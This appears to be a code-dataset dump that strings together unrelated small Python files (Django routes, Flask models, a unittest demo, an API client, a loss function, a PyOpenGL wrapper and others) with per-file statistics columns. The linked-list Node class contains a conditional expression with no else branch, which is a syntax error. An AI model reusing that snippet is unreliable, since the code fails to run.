# URL routes for the checkout app; mounted by the project-level URLconf.
urlpatterns = [
    # Checkout page at the app's root URL.
    path('', CheckoutView.as_view() , name='checkout'),
    # Promo-code submission endpoint ("Promo-submit" is the literal URL segment).
    path('Promo-submit',SubmitPromoView.as_view(),name ='promo-submit'),
] | 32.285714 | 72 | 0.725664 | 26 | 226 | 6.230769 | 0.576923 | 0.074074 | 0.123457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123894 | 226 | 7 | 73 | 32.285714 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0.140969 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
a8b0b0058eb68a0f7f90fbc17bd3044ac1982af6 | 202 | py | Python | tractseg/experiments/dm_reg_lowres.py | inaccel/TractSeg | cc9feefd71ba9fcfacc4d3a7656f1a77bab9a287 | [
"Apache-2.0"
] | 148 | 2017-11-09T10:28:15.000Z | 2022-03-30T16:45:24.000Z | tractseg/experiments/dm_reg_lowres.py | inaccel/TractSeg | cc9feefd71ba9fcfacc4d3a7656f1a77bab9a287 | [
"Apache-2.0"
] | 170 | 2018-06-25T17:33:27.000Z | 2022-03-17T12:42:21.000Z | tractseg/experiments/dm_reg_lowres.py | inaccel/TractSeg | cc9feefd71ba9fcfacc4d3a7656f1a77bab9a287 | [
"Apache-2.0"
] | 57 | 2018-05-21T00:10:56.000Z | 2022-03-30T02:56:39.000Z |
from tractseg.experiments.base_legacy.dm_reg_legacy import Config as DmRegConfig
class Config(DmRegConfig):
    """Density-map regression experiment variant for low-resolution data.

    Inherits everything from the legacy DmRegConfig and only overrides the
    dataset/resolution/feature-file selection below.
    """

    # Dataset identifier -- presumably the HCP subset with 32 gradient
    # directions; confirm against the data loader.
    DATASET = "HCP_32g"
    # Spatial resolution of the input images.
    RESOLUTION = "2.5mm"
    # Base name of the precomputed peak-feature files used as network input.
    FEATURES_FILENAME = "32g_25mm_peaks"
| 20.2 | 80 | 0.757426 | 26 | 202 | 5.615385 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047337 | 0.163366 | 202 | 9 | 81 | 22.444444 | 0.816568 | 0 | 0 | 0 | 0 | 0 | 0.129353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
766e873236e512511ee845050ba334664937c0c7 | 620 | py | Python | books/python-3-oop-packt/Chapter12/12_05_skipping_tests.py | phiratio/lpthw | a32240d4355fb331805d515f96e1d009914e5c47 | [
"MIT"
] | 73 | 2016-09-15T23:07:04.000Z | 2022-03-05T15:09:48.000Z | books/python-3-oop-packt/Chapter12/12_05_skipping_tests.py | phiratio/lpthw | a32240d4355fb331805d515f96e1d009914e5c47 | [
"MIT"
] | 34 | 2019-12-16T16:53:24.000Z | 2022-01-13T02:29:30.000Z | books/python-3-oop-packt/Chapter12/12_05_skipping_tests.py | phiratio/lpthw | a32240d4355fb331805d515f96e1d009914e5c47 | [
"MIT"
] | 51 | 2016-10-07T20:47:51.000Z | 2021-12-22T21:00:24.000Z | import unittest
import sys
class SkipTests(unittest.TestCase):
    """Demonstrates unittest decorators for skipping and expected failures.

    Every assertion here is deliberately false; the decorators control how
    each failure is reported (expected failure vs. skipped).
    """

    @unittest.expectedFailure
    def test_fails(self):
        # Fails, but is reported as an "expected failure", not an error.
        self.assertEqual(False, True)

    @unittest.skip("Test is useless")
    def test_skip(self):
        # Unconditionally skipped with the given reason string.
        self.assertEqual(False, True)

    @unittest.skipIf(sys.version_info.minor == 4,
                     "broken on 3.4")
    def test_skipif(self):
        # Skipped only when the interpreter's minor version is 4.
        self.assertEqual(False, True)

    @unittest.skipUnless(sys.platform.startswith('linux'),
                         "broken unless on linux")
    def test_skipunless(self):
        # Runs only on Linux; skipped on every other platform.
        self.assertEqual(False, True)
if __name__ == "__main__":
    # Run the test suite when this file is executed directly.
    unittest.main()
| 24.8 | 58 | 0.658065 | 73 | 620 | 5.410959 | 0.452055 | 0.070886 | 0.192405 | 0.243038 | 0.344304 | 0.273418 | 0 | 0 | 0 | 0 | 0 | 0.006237 | 0.224194 | 620 | 24 | 59 | 25.833333 | 0.814969 | 0 | 0 | 0.210526 | 0 | 0 | 0.101613 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 1 | 0.210526 | false | 0 | 0.105263 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
766edd163148fb3ce2a73f8bdc17845525f03709 | 2,688 | py | Python | flaskbog/models.py | MuthangaShem/flask-blog | 5b32bcd0c8592763f871a1c421ecf0f0ea7adc14 | [
"MIT"
] | null | null | null | flaskbog/models.py | MuthangaShem/flask-blog | 5b32bcd0c8592763f871a1c421ecf0f0ea7adc14 | [
"MIT"
] | null | null | null | flaskbog/models.py | MuthangaShem/flask-blog | 5b32bcd0c8592763f871a1c421ecf0f0ea7adc14 | [
"MIT"
] | null | null | null | from flask.ext.sqlalchemy import SQLAlchemy
from werkzeug import generate_password_hash, check_password_hash
from flaskblog import app
from config import WHOOSH_ENABLED
from math import ceil
db = SQLAlchemy(app)
class Admin(db.Model):
    """Admin user row.

    The is_authenticated/is_active/is_anonymous/get_id methods match the
    Flask-Login user interface — confirm against the login setup.
    """
    __tablename__ = 'admin'
    id = db.Column(db.Integer, primary_key=True)
    userd = db.Column(db.String(100))  # username column (note the 'userd' name)

    def __init__(self, user):
        # BUG FIX: the value was previously stored on ``self.user`` while the
        # mapped column (and __repr__) use ``userd`` — the username was never
        # persisted. Assign to the mapped attribute instead.
        self.userd = user

    def __repr__(self):
        return "<User: %s>" % (self.userd)

    def is_authenticated(self):
        # Non-anonymous users are always considered authenticated.
        return True

    def is_active(self):
        return True

    def is_anonymous(self):
        return False

    def get_id(self):
        # Python 2 codebase: ids are returned as unicode strings.
        return unicode(self.id)
# Association table for the many-to-many Post <-> Tag relationship.
tags = db.Table('posts_tags',
                db.Column('tag_id', db.Integer, db.ForeignKey('tags.id')),
                db.Column('post_id', db.Integer, db.ForeignKey('posts.id'))
                )
class Post(db.Model):
    """Blog post with a title, body text and any number of tags."""
    __tablename__ = 'posts'
    # Whoosh full-text search indexes the 'text' column (enabled at module
    # bottom when WHOOSH_ENABLED is set).
    __searchable__ = ['text']
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(120))
    text = db.Column(db.Text,)
    # Many-to-many through the 'tags' association table; Tag gains a lazy
    # 'posts' backref.
    tags = db.relationship('Tag', secondary=tags, backref=db.backref('posts', lazy='dynamic'))

    def __init__(self, title, text, tags):
        self.title = title
        self.text = text
        self.tags = tags

    def __repr__(self):
        return '<Title %r, Text %r, Tag %r>' % (self.title, self.text, self.tags)
class Tag(db.Model):
    """A single tag label that can be attached to many posts."""
    __tablename__ = 'tags'
    id = db.Column(db.Integer, primary_key=True)
    tag = db.Column(db.String(120))  # the tag's display text

    def __init__(self, tag):
        self.tag = tag

    def __repr__(self):
        return '<Tag %r>' % self.tag
class Pagination(object):
    """Pure-arithmetic pagination helper for listing pages.

    Knows the current page (1-based), the page size and the total item
    count, and derives page count, prev/next availability and the page
    number strip from them.
    """

    def __init__(self, page, per_page, total_count):
        self.page = page                # current 1-based page number
        self.per_page = per_page        # items per page
        self.total_count = total_count  # total number of items

    @property
    def pages(self):
        """Total number of pages, counting a final partially-filled page."""
        return int(ceil(self.total_count / float(self.per_page)))

    @property
    def has_prev(self):
        return self.page > 1

    @property
    def has_next(self):
        return self.page < self.pages

    def iter_pages(self, left_edge=2, left_current=2,
                   right_current=5, right_edge=2):
        """Yield page numbers for a pagination widget, with None for gaps.

        Emits pages near the start (left_edge), around the current page
        (left_current/right_current) and near the end (right_edge); each
        skipped run is marked by a single None.
        """
        last = 0
        # range() instead of the Python-2-only xrange(): identical iteration
        # behavior, and keeps the class importable on Python 3.
        for num in range(1, self.pages + 1):
            if num <= left_edge or \
               (num > self.page - left_current - 1 and
                num < self.page + right_current) or \
               num > self.pages - right_edge:
                if last + 1 != num:
                    yield None
                yield num
                last = num
# Optionally enable Whoosh full-text indexing of Post (see __searchable__).
if WHOOSH_ENABLED:
    import flask.ext.whooshalchemy as whooshalchemy
    whooshalchemy.whoosh_index(app, Post)
| 25.121495 | 94 | 0.599702 | 352 | 2,688 | 4.352273 | 0.272727 | 0.065274 | 0.045692 | 0.023499 | 0.144256 | 0.064621 | 0.064621 | 0.064621 | 0 | 0 | 0 | 0.009911 | 0.28683 | 2,688 | 106 | 95 | 25.358491 | 0.789254 | 0 | 0 | 0.144737 | 1 | 0 | 0.043155 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.197368 | false | 0.013158 | 0.078947 | 0.131579 | 0.618421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7676d462ee542ed87de95de7c08ee86a04763486 | 272 | py | Python | ds/linklist/node.py | BizShuk/code_algo | 1964a16ba382b360d85937b65b8acd51c1eb5418 | [
"MIT"
] | null | null | null | ds/linklist/node.py | BizShuk/code_algo | 1964a16ba382b360d85937b65b8acd51c1eb5418 | [
"MIT"
] | null | null | null | ds/linklist/node.py | BizShuk/code_algo | 1964a16ba382b360d85937b65b8acd51c1eb5418 | [
"MIT"
] | null | null | null | class Node(object):
"""Docstring for Node. """
def __init__(self,val , next=None):
"""TODO: to be defined1. """
self.next = next if next is not None
self.val = val
def isCircle(self):
pass
def length(self):
pass
| 18.133333 | 44 | 0.536765 | 35 | 272 | 4.057143 | 0.6 | 0.098592 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005556 | 0.338235 | 272 | 14 | 45 | 19.428571 | 0.783333 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0 | 0 | null | null | 0.25 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
768264c563fd0507706f9581b69eab3475ef4389 | 131 | py | Python | train.py | tonypeng/ez-image-segmentation | 94ac965cee1d11b7118890ca0219c04e60e7435b | [
"MIT"
] | 2 | 2017-12-07T02:02:05.000Z | 2017-12-10T00:14:44.000Z | train.py | tonypeng/ez-image-segmentation | 94ac965cee1d11b7118890ca0219c04e60e7435b | [
"MIT"
] | null | null | null | train.py | tonypeng/ez-image-segmentation | 94ac965cee1d11b7118890ca0219c04e60e7435b | [
"MIT"
] | null | null | null | from Trainer import *
from TrainerOptions import *
def main():
    """Parse trainer options and run a full training session.

    parse_args presumably reads sys.argv — confirm in TrainerOptions.
    """
    opt = TrainerOptions()
    opt.parse_args()
    trainer = Trainer(opt)
    trainer.train()


if __name__ == "__main__":
    # Guarded entry point: importing this module no longer starts training.
    main()
7692deee3b24ee25055a2b5cefb7aaffcbc347d6 | 801 | py | Python | python_for_everybody/unicode.py | timothyyu/p4e-prac | f978b71ce147b6e9058372929f2666c2e67d0741 | [
"BSD-3-Clause"
] | null | null | null | python_for_everybody/unicode.py | timothyyu/p4e-prac | f978b71ce147b6e9058372929f2666c2e67d0741 | [
"BSD-3-Clause"
] | null | null | null | python_for_everybody/unicode.py | timothyyu/p4e-prac | f978b71ce147b6e9058372929f2666c2e67d0741 | [
"BSD-3-Clause"
] | 1 | 2020-04-18T16:09:04.000Z | 2020-04-18T16:09:04.000Z | #Unicode characters and strings
#1960s/1970s ---> we assumed one byte is one character and went it with
# a byte and character were assumed to be the same thing
#ASCII goes up to 127
print(ord('H'))
print(ord('e'))
print(ord('\n'))
print(ord('G'))
#UTF-16 - fixed length, two byes
#UTF-32 - fixed length, four byes
#UTF-8 - 1-4 bytes
# upwards compat with ASCII
# auto detection between ASCII & UTF-8
# UTF-8 rec best pracetice for encoding/data exchange between systems
# in python3, all strings are unicode
# data in from external resource
# must be decoded based on its character set so it's properly represented in py3 as a string
# when talking to external network resource that sends bytes,
# you need to encode the py3 strings into a given char encoding | 33.375 | 96 | 0.71161 | 133 | 801 | 4.285714 | 0.661654 | 0.05614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03645 | 0.212235 | 801 | 24 | 97 | 33.375 | 0.866878 | 0.831461 | 0 | 0 | 0 | 0 | 0.041322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
76a8ad4e4b64bc7dd9adb094028e31014909c8fe | 4,201 | py | Python | pythonanywhere_client/webapps.py | hakancelik96/pythonanywhere-client | 52c8913760304c30150157b961e93c4a4bf5e82f | [
"MIT"
] | 6 | 2019-06-30T20:59:38.000Z | 2019-12-28T11:02:11.000Z | pythonanywhere_client/webapps.py | hakancelik96/pythonanywhere-client | 52c8913760304c30150157b961e93c4a4bf5e82f | [
"MIT"
] | 5 | 2019-06-30T18:55:15.000Z | 2020-06-19T15:37:01.000Z | pythonanywhere_client/webapps.py | hakancelik96/pythonanywhere-client | 52c8913760304c30150157b961e93c4a4bf5e82f | [
"MIT"
] | 1 | 2019-12-28T17:04:37.000Z | 2019-12-28T17:04:37.000Z | from .client import client_decorator
class Webapps:
def __init__(self, client):
self.client = client
@client_decorator(op="webapps")
def get(self):
"List all webapps"
@client_decorator(op="webapps")
def post(self, domain_name, python_version):
"""
Create a new webapp with manual configuration.
Use (for example) "python36" to specify Python 3.6.
"""
class DomaiName:
def __init__(self, client, domain_name):
self.client = client
self.domain_name = domain_name
@client_decorator(op="webapps", name="{self.domain_name}")
def get(self):
"Return information about a web app's configuration"
@client_decorator(op="webapps", name="{self.domain_name}")
def put(
self, python_version, source_directory, virtualenv_path, force_https
):
"Modify configuration of a web app. (NB a reload is usually required to apply changes)."
@client_decorator(op="webapps", name="{self.domain_name}")
def patch(
self, python_version, source_directory, virtualenv_path, force_https
):
"Modify configuration of a web app. (NB a reload is usually required to apply changes)."
@client_decorator(op="webapps", name="{self.domain_name}")
def delete(self):
"""
Delete the webapp. This will take the site offline.
Config is backed up in /var/www, and your code is not touched.
"""
class Reload:
def __init__(self, client, domain_name):
self.client = client
self.domain_name = domain_name
@client_decorator(op="webapps", name="{self.domain_name}", path="reload")
def post(self):
"Reload the webapp to reflect changes to configuration and/or source code on disk."
class Ssl:
def __init__(self, client, domain_name):
self.client = client
self.domain_name = domain_name
@client_decorator(op="webapps", name="{self.domain_name}", path="ssl")
def get(self):
"""
Get and set TLS/HTTPS info. POST parameters to the right are incorrect,
use `cert` and `private_key` when posting.
"""
@client_decorator(op="webapps", name="{self.domain_name}", path="ssl")
def post(
self, python_version, source_directory, virtualenv_path, force_https
):
"""
Get and set TLS/HTTPS info. POST parameters to the right are incorrect,
use `cert` and `private_key` when posting.
"""
@client_decorator(op="webapps", name="{self.domain_name}", path="ssl")
def delete(self):
"""
Get and set TLS/HTTPS info. POST parameters to the right are incorrect,
use `cert` and `private_key` when posting.
"""
class StaticFiles:
def __init__(self, client, domain_name):
self.client = client
self.domain_name = domain_name
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files"
)
def get(self):
"List all the static files mappings for a domain."
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files"
)
def post(self, url, path):
"Create a new static files mapping. (webapp restart required)"
class StaticFilesId:
def __init__(self, client, domain_name, id):
self.client = client
self.domain_name = domain_name
self.id = id
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files/{self.id}"
)
def get(self):
"Get URL and path of a particular mapping."
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files/{self.id}"
)
def put(self, url, path):
"Modify a static files mapping. (webapp restart required)"
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files/{self.id}"
)
def patch(self, url, path):
"Modify a static files mapping. (webapp restart required)"
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files/{self.id}"
)
def delete(self):
"Remove a static files mapping. (webapp restart required)"
| 31.118519 | 96 | 0.63961 | 537 | 4,201 | 4.83054 | 0.191806 | 0.115652 | 0.107941 | 0.148034 | 0.752506 | 0.720894 | 0.695451 | 0.680031 | 0.664611 | 0.624518 | 0 | 0.001258 | 0.243037 | 4,201 | 134 | 97 | 31.350746 | 0.814465 | 0.286836 | 0 | 0.627907 | 0 | 0 | 0.3232 | 0.025237 | 0 | 0 | 0 | 0 | 0 | 1 | 0.255814 | false | 0 | 0.011628 | 0 | 0.337209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76c2da6bb9112f5fb0067799713d55cf0a448eb6 | 241 | py | Python | specviz/tests/test_startup.py | ibusko/specviz | b8bcd495e5b43dc2b90f7bf2d5bad2d27c6990aa | [
"BSD-3-Clause"
] | null | null | null | specviz/tests/test_startup.py | ibusko/specviz | b8bcd495e5b43dc2b90f7bf2d5bad2d27c6990aa | [
"BSD-3-Clause"
] | null | null | null | specviz/tests/test_startup.py | ibusko/specviz | b8bcd495e5b43dc2b90f7bf2d5bad2d27c6990aa | [
"BSD-3-Clause"
] | null | null | null | from qtpy import QtCore
from specviz.app import Application
def test_specviz_startup(qtbot):
app = Application([], dev=True)
qtbot.addWidget(app.current_workspace)
qtbot.mouseClick(app.current_workspace, QtCore.Qt.LeftButton)
| 24.1 | 65 | 0.775934 | 31 | 241 | 5.903226 | 0.612903 | 0.10929 | 0.20765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13278 | 241 | 9 | 66 | 26.777778 | 0.875598 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
4f180829cd0e9a3948d5bb3da916f00952583927 | 1,083 | py | Python | Cursoemvideo/URI/1018 - Banknotes.py | Vith-MCB/Phyton---Curso-em-Video | d13a2150df022b9712b3b3136e9afc963864403c | [
"MIT"
] | 1 | 2021-06-26T17:07:53.000Z | 2021-06-26T17:07:53.000Z | Cursoemvideo/URI/1018 - Banknotes.py | Vith-MCB/Phyton---Curso-em-Video | d13a2150df022b9712b3b3136e9afc963864403c | [
"MIT"
] | null | null | null | Cursoemvideo/URI/1018 - Banknotes.py | Vith-MCB/Phyton---Curso-em-Video | d13a2150df022b9712b3b3136e9afc963864403c | [
"MIT"
] | null | null | null | '''
N = int(input())
notas100 = N//100
notas50 = (N-(notas100*100))//50
notas20 = (N-(notas100*100+notas50*50))//20
notas10 = (N-(notas100*100+notas50*50+notas20*20))//10
notas5 = (N-(notas100*100+notas50*50+notas20*20+notas10*10))//5
notas2 = (N-(notas100*100+notas50*50+notas20*20+notas10*10+notas5*5))//2
notas1 = (N-(notas100*100+notas50*50+notas20*20+notas10*10+notas5*5+notas2*2))
print(notas100, ' nota(s) de R$ 100,00')
print(notas50, ' nota(s) de R$ 50,00')
print(notas20, ' nota(s) de R$ 20,00')
print(notas10, ' nota(s) de R$ 10,00')
print(notas5, ' nota(s) de R$ 5,00')
print(notas2, ' nota(s) de R$ 2,00')
print(notas1, ' nota(s) de R$ 1,00')
'''
N = int(input())
n100 = N//100
N = N - n100*100
n50 = N//50
N = N - n50*50
n20 = N//20
N = N - n20*20
n10 = N//10
N = N - n10*10
n5 = N//5
N = N - n5*5
n2 = N//2
N = N - n2*2
n1 = N
print(n100, ' nota(s) de R$ 100,00')
print(n50, ' nota(s) de R$ 50,00')
print(n20, ' nota(s) de R$ 20,00')
print(n10, ' nota(s) de R$ 10,00')
print(n5, ' nota(s) de R$ 5,00')
print(n2, ' nota(s) de R$ 2,00')
print(n1, ' nota(s) de R$ 1,00') | 27.769231 | 78 | 0.604801 | 224 | 1,083 | 2.924107 | 0.133929 | 0.10687 | 0.149618 | 0.170992 | 0.619847 | 0.587786 | 0.554198 | 0.2 | 0.2 | 0.140458 | 0 | 0.254625 | 0.151431 | 1,083 | 39 | 79 | 27.769231 | 0.458107 | 0.602031 | 0 | 0 | 0 | 0 | 0.325472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f264991488a362e89d5b91959e0b88b2e880b7b | 1,482 | py | Python | public_comment/lib/managers.py | codeforkyana/public-comment | b2e579ce0e1e8117670eaff6f142b594e6c78dc8 | [
"MIT"
] | null | null | null | public_comment/lib/managers.py | codeforkyana/public-comment | b2e579ce0e1e8117670eaff6f142b594e6c78dc8 | [
"MIT"
] | null | null | null | public_comment/lib/managers.py | codeforkyana/public-comment | b2e579ce0e1e8117670eaff6f142b594e6c78dc8 | [
"MIT"
] | null | null | null | import logging
from datetime import datetime
from django.db import models
from django.db.models import QuerySet
from . import _thread_locals
logger = logging.getLogger(__name__)
class SoftDeleteManager(models.Manager):
    """Manager that hides soft-deleted rows (non-null ``deleted_at``) by default.

    Construct with ``deleted=True`` to include soft-deleted rows as well.
    """

    def __init__(self, *args, **kwargs):
        # Pull our custom flag out before the base Manager sees the kwargs.
        self.with_deleted = kwargs.pop("deleted", False)
        super().__init__(*args, **kwargs)

    def _base_queryset(self):
        # Route everything through SoftDeleteQuerySet so bulk delete()
        # soft-deletes instead of issuing a real SQL DELETE.
        return SoftDeleteQuerySet(self.model)

    def get_queryset(self):
        queryset = self._base_queryset()
        if not self.with_deleted:
            queryset = queryset.filter(deleted_at=None)
        return queryset
class SoftDeleteQuerySet(QuerySet):
    """QuerySet whose delete() soft-deletes by stamping ``deleted_at``."""

    def delete(self):
        # Soft delete: mark rows instead of removing them.
        # NOTE(review): utcnow() is naive — if the project runs with
        # USE_TZ=True, django.utils.timezone.now() would be the aware
        # equivalent; confirm before changing.
        return super().update(deleted_at=datetime.utcnow())

    def hard_delete(self):
        # Permanently remove the rows (real SQL DELETE).
        return super().delete()

    def restore(self):
        # Undo a soft delete by clearing the timestamp.
        return super().update(deleted_at=None)
class OrganizationOwnedModelManager(SoftDeleteManager):
    """Soft-delete manager that also scopes querysets to the organization
    stored in thread-local state (set elsewhere — presumably per request;
    confirm against the middleware that writes ``_thread_locals``).

    BUG FIX: the previous ``__init__`` override popped ``"deleted"`` from
    kwargs and then called ``super().__init__()``, which popped it again
    (getting the default ``False``) and overwrote ``self.with_deleted`` —
    so ``deleted=True`` was silently ignored. Inheriting
    SoftDeleteManager's ``__init__`` handles the flag correctly, so the
    override is removed.
    """

    def get_queryset(self):
        qs = super().get_queryset()
        # The Organization model itself is not organization-scoped.
        if self.model.__name__ != "Organization":
            organization = getattr(_thread_locals, "organization", None)
            if organization:
                logger.info("Setting organization on queryset to %s (%s)", organization, organization.id)
                return qs.filter(organization=organization).prefetch_related("organization")
        return qs
| 29.058824 | 105 | 0.669366 | 164 | 1,482 | 5.786585 | 0.317073 | 0.04215 | 0.047418 | 0.031612 | 0.268704 | 0.229715 | 0.166491 | 0.166491 | 0.166491 | 0.166491 | 0 | 0 | 0.221997 | 1,482 | 50 | 106 | 29.64 | 0.82307 | 0 | 0 | 0.277778 | 0 | 0 | 0.062753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.138889 | 0.111111 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
4f2998a54e1c8d576f1abf4eaabd4425870ed461 | 561 | py | Python | app/pytorch/book/chp004/e1/cross_entropy.py | yt7589/aqp | c9c1c79facdea7ace73e2421e8a5868d87fb58dd | [
"Apache-2.0"
] | null | null | null | app/pytorch/book/chp004/e1/cross_entropy.py | yt7589/aqp | c9c1c79facdea7ace73e2421e8a5868d87fb58dd | [
"Apache-2.0"
] | null | null | null | app/pytorch/book/chp004/e1/cross_entropy.py | yt7589/aqp | c9c1c79facdea7ace73e2421e8a5868d87fb58dd | [
"Apache-2.0"
] | null | null | null | from __future__ import division
import numpy as np
from loss import Loss
from npai_stats import NpaiStats
from sigmoid import Sigmoid
class CrossEntropy(Loss):
    """Cross-entropy loss for one-hot targets ``y`` and predictions ``p``."""

    def __init__(self):
        pass

    def loss(self, y, p):
        """Elementwise cross-entropy ``-y * log(p)``."""
        # Clip predictions away from 0 and 1 so log() never sees zero.
        clipped = np.clip(p, 1e-15, 1 - 1e-15)
        return - y * np.log(clipped)

    def acc(self, y, p):
        """Accuracy of argmax predictions.

        Assumes one row per sample (2-D arrays) — confirm with callers.
        """
        predicted = np.argmax(p, axis=1)
        expected = np.argmax(y, axis=1)
        return NpaiStats.accuracy_score(expected, predicted)

    def gradient(self, y, p):
        """Derivative of the loss w.r.t. ``p``: ``-(y / p)``."""
        # Same clipping as loss() to avoid division by zero.
        clipped = np.clip(p, 1e-15, 1 - 1e-15)
        return - (y / clipped)
4f2c83bf688f78376d32efdf1389eb175038991e | 1,134 | py | Python | deep-rl/lib/python2.7/site-packages/OpenGL/GL/EXT/framebuffer_blit.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 210 | 2016-04-09T14:26:00.000Z | 2022-03-25T18:36:19.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/GL/EXT/framebuffer_blit.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 72 | 2016-09-04T09:30:19.000Z | 2022-03-27T17:06:53.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/GL/EXT/framebuffer_blit.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 64 | 2016-04-09T14:26:49.000Z | 2022-03-21T11:19:47.000Z | '''OpenGL extension EXT.framebuffer_blit
This module customises the behaviour of the
OpenGL.raw.GL.EXT.framebuffer_blit to provide a more
Python-friendly API
Overview (from the spec)
This extension modifies EXT_framebuffer_object by splitting the
framebuffer object binding point into separate DRAW and READ
bindings. This allows copying directly from one framebuffer to
another. In addition, a new high performance blit function is
added to facilitate these blits and perform some data conversion
where allowed.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/framebuffer_blit.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.EXT.framebuffer_blit import *
from OpenGL.raw.GL.EXT.framebuffer_blit import _EXTENSION_NAME
def glInitFramebufferBlitEXT():
    '''Return boolean indicating whether this extension is available'''
    # ``extensions`` is already imported at module level; the redundant
    # function-local re-import is removed.
    return extensions.hasGLExtension(_EXTENSION_NAME)
